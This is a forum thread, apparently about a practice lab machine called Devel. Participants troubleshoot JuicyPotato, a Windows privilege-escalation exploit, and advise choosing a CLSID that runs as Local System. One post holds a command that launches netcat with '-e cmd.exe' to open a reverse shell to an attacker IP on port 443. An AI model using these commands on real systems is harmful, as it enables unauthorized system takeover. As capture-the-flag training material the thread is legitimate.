JuicyPotato in DEVEL

So I have compiled JuicyPotato to work with x86,
but when I run
.\j.exe -l 1338 -p c:\tmp\nc.exe -a "-e cmd.exe 10.10.14.68 443" -t * -c "{A47979D2-C419-11D9-A5B4-001185AD2B89}"

I have no shell.
Even if I run
.\j.exe -p c:\windows\system32\cmd.exe -t * -l 1338 -c "{A47979D2-C419-11D9-A5B4-001185AD2B89}"

I stay in USER MODE, no privileges.
What might be the problem?

Log from JuicyPotato:

Testing {A47979D2-C419-11D9-A5B4-001185AD2B89} 1338
......
[+] authresult 0
{A47979D2-C419-11D9-A5B4-001185AD2B89};NT AUTHORITY\LOCAL SERVICE

[+] CreateProcessWithTokenW OK

Comments

  • The CLSID "{A47979D2-C419-11D9-A5B4-001185AD2B89}" you are trying to reflect is not running as Local System but as Local Service.
    Local Service cannot create interactive windows out of Session 0. As far as I understand you are running in Session != 0 as an interactive user, so you can't see any window created on your Session. Try to change the CLSID and be sure you choose one that is running as Local System.

    splintercode

  • You were right. Thank you!

  • @talboris said:

    You were right. Thank you!

    Could you post the right CLSID?

    peek

  • Try forcing the CreateProcessAsUser() call (-t u); you will get a semi-working shell... but all this doesn't make sense. Why should you use a CLSID which impersonates a Local/Network Service?

  • @peek said:
    @talboris said:

    You were right. Thank you!

    Could you post the right CLSID?

    If you don't specify the CLSID it will use BITS; otherwise here you can find plenty of them: https://github.com/decoder-it/juicy-potato/blob/master/CLSID/README.md

  • @peek said:

    @talboris said:

    You were right. Thank you!

    Could you post the right CLSID?

    Don't remember anymore, it was one of the BITS ones.

  • edited January 23

    @talboris did you get juicypotato32 to work on Devel? I'm having issues with BITS not being started/running and I think that is why it doesn't work for me.
    I've also tried with the CLSID for ShellHWDetection but no dice.

    EDIT: I spoke too soon... I got it to work.
